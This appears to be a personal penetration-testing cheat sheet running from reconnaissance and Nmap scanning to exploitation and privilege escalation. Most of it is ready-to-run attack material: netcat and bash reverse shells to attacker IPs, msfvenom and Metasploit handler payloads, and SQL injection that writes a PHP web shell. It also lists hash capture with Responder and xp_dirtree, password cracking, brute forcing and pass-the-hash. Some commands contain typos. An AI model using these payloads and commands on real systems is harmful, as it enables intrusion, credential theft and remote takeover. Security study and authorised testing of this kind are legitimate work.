Passive Social Media, Company Website, Public Availble Resources, Jobs Openning. Netcraft, Archive.org, Shodan, Metagofile, Maltego,recon-ng, Pipls, Thearchive.org,sub3listr
Active Interactive with the victim. Become a facebook friend for example
Extract domain from index.html wget invid.se cat index.html | grep “href” | cut -d”/” -f3 | grep “site\.se” | cut -d'”‘ -f1 | sort -u > site.txt www data extractor Windows Web Data Extractor Linux httrack (linux) Enumeration / Scanning Banner grabbing whatweb host.se Netdiscover Passive Mode netdiscover -i eth0 -p Active Mode netdiscover -ai eth0 -r 192.168.8.0/24 -f
Nmap explain closed,filtered An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network. closed A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next. filtered Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically. unfiltered The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open. open|filtered Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way. closed|filtered This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
Nmap examples nmap -p 80 –script=http-enum http://www.certifiedhacker.com nmap -p- -Pn -sS -sV -A 10.10.10.1 nmap -p- -Pn -sU -sS -sV -A 10.10.10.1 nmap -sC -sV -oA nmap/initial 10.10.10.1 nmap -p 445 –script safe -Pn -n 10.10.10.1 nmap -p 445 –script “vuln and safe” -Pn -n 10.10.10.1 Nmap Scripts –script=vuln All default vulnerability scrips –script=http-enum HTTP enum Banner Grab and so on –script=http-shellshock Shellchock detect –script=smb-brute SMB Brute Force
Default scripts and smb: locate -r ‘\.nse$’ | xargs grep categories | grep ‘default\|version’ | grep smb Nmap – Options -n disable dns -sC standard scipt -sn ping sweep -sT Connect Scan 3 way handshake -sS Stealth halv open scan syn ->syn ack -> reset -sX Xmas scan (Fin/Urg/push) no repsonse port open (LINUX machines) -sN Nullscan TCP packet with no data. no repsonse port open (LINUX machines) -sV Version -sU UDP scan -p- -A all ports and Agressive -sU -p 162 snmp agent Nmap – Combos -sS -sV Stealt and Version -sI Idle scan, zombie node (good for ids) -sS -O Operating System -sn -f Ping sweep fragmentation -p 80 -A -T3 Port 80 Agressive on port 80 and tray harder with T3 (T0 -T5) T0 slow T5 fast -sS -D:RND:10 Decoy
UDP scan udp can have false positive if the host dont respond on icmp nc -unvv -w 1 -z 10.0.2.15 160-165
Hping3 Half-Open SYN scan hping3 -8 -S 1.2.3.4.5 -p 80 XMAS Tree Scan hping3 -F -P -U Null Scan hping3 Fin Scan hping3 -F Ack Scan hping3 -A Udp scan hping3 -2
Ping and portscan from shell ping from shell to get online hosts for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo “Online: 172.20.40.$ip”; done
Portscan from shell without nmap or you can download static nmap from github for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo “open – $port”) 2> /dev/null; done
Look for ports that is open or close with bash bash -c ‘echo 1> /dev/tcp/172.20.20.188/1900 && echo open || echo false’
Gobuster ./gobuster -fw -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt Dirb dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt Curl curl –url “imap://mail.example.com/” –user “bobby:tables” Upload curl –upload-file file.txt -v –url <url> -0 –http1.0 Cewl Find words on webpages that can be used for password crack. cewl http://www.site.se -m 6 -w /cewl.txt Can then be passed to John The Ripper
Directory or Path Traversal 192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd Null Byte ?page=../../../../../etc/passwd%00
Wpscan wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt wpscan –url <url> Scan cms wpscan –url <url> –enumerate vp (Scan plugins) wpscan –url <url> –enumerate ut (scan Themes) wpscan –url <url> –enumerate u (Enumerate Users) wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)
Windows Tips Run as command runas /netonly /user:domain.dc\svc_user cmd Windows Credentials Editor (WCE) wce64.exe -w Sharphound SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1 Find files Windows where /R C:\ bash.exe
Getting Access and Maintaining Acccess Searchsploit Mirror down searchsplit -m exploits/php/webapps/18650.py
exploit -j sessions -i sessions l setg = global value ex. setg RHOST 192.168.1.1 Metaexploit Steps mfsconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST ip SET LPORT port exploit -j
Access the exploit shell.aspx
shell systeminfo
search suggest exploits use post/multi/recon/local_exploit_suggester set SESSION 1 run
use exploit/windows/local/ms10_015_kitrap0d set lhost ip set lport port Create Payloads Msfvenom Linux msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none
Windows Tftp Server atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/ Client tftp -i 192.168.1.1 GET nc.exe
Ftp On Windows you can script this with a text file ftp -s ftp.txt Ftp 192.168.1.1.1 ls get nc.exe put nc.exe set binary Reverse Shell Netcat Ncat to get support for ssl and rules Listener nc -lvnp 4444 Connector nc -nv 192.168.1.1 25
Netcat Command execution Victim nc -lvnp 4444 -e /bin/bash Source nc -nv 10.0.2.15 4444 Netcat Windows to get PowerShell shell nc64.exe 10.1.1.1 9001 -e powershell
Shell from dash or bad shell Attacker: nc -nlvp 9001 Victim bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’ You get shell on Attacker then python -c ‘import pty; pty.spawn(“/bin/bash”)’ After that script -q /dev/null Then backround ctrl z Then type stty raw -echo Then hit fg for foreground
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/ mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php Nice remote shell python -c ‘import pty; pty.spawn(“/bin/bash”)’ set TERM=linux No real bash ctrl z background stty raw -echo fg
Password Responder Set up responder to listen to clients and capture hashes responder
Capture LTM hashes from sql injection Start smb server On Attacker impacket-smbserver share $(pwd)
Use this on the webpage: ; use master; exec xp_dirtree ‘\\10.1.1.1\share’;– Unshadow sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt HASHCAT hashcat -h | grep -i ntlm
to launch a combination attack against MD5 password hashes hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
a straight through attack is super fast on simple passwords hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper john hashes.txt -format=nt -show (CrackNTLM)
use the cewel.txt in john the ripper to
john –wordlist=cvewl.txt –rules –stdout > pass.txt
john –wordlist:/usr/share/wordlists/rockyou.txt
RSA Now we need to convert the rsa key to john format and save it in a file: #root@kali: ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist: #root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile
When it’s done, you can show the password if it has been cracked by issuing the following command: #root@kali: john –show rsa2johnfile Passwords dumps Windows Pwdump and FGdump crunch Create Passwordlists crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash Passing the hash pth-* export SMBHASH=1231234124124124124:1243124124124124124124124 pth-winexe -U administrator% //192.168.1.1 cmd
Ncrack use for rdp brute force ncrack -v -f –user administrator -P password.txt rdp//192.168.1.1,CL1 Hydra hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I MySQL Connect to local database mysql -u zabbix -D zabbixdb -p Sqlmap Use burpsuite to capture login request Save login request to login.req sqlmap r login.req –level 5 Search for databases sqlmap –u http://192.168.1.1/index.php?par= –dbs Checking privileges of the users in database sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges
Reading a file from the web server sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch
Dump Username and Password sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5
Find space to output db ?id=1 union select 1,2,3,4,5,6,7,8,9 — –
Get username of the sql-user ?id=1 union select 1,2,3,4,user(),6,7,8,9 — –
Get version ?id=1 union select 1,2,3,4,version(),6,7,8,9 — –
Get all tables ?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –
Get all columns from a specific table ?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password) ?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read file ?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — – ?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –
Create a file and call it to check if really created ?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — – ?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –
Create a file to get a shell ?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — – ?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –
Linux Privilege Escalation The things that I have used from this page is: # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -1000 -type d 2>/dev/null # SGID (chmod 2000) – run as the group, not the user who started it. find / -perm -g=s -type f 2>/dev/null # SUID (chmod 4000) – run as the owner, not the user who started it. find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null LinEnum ./LinEnum.sh -t > kali.txt Commands cat /etc/issue cat /etc/lsb-release cat /etc/passwd cat /etc/group cat /etc/shadow ps aux | grep root crontab -l Port forward ssh -L 8080:127.0.0.1:80 [email protected] ssh -R 8080:127.0.0.1:80 [email protected]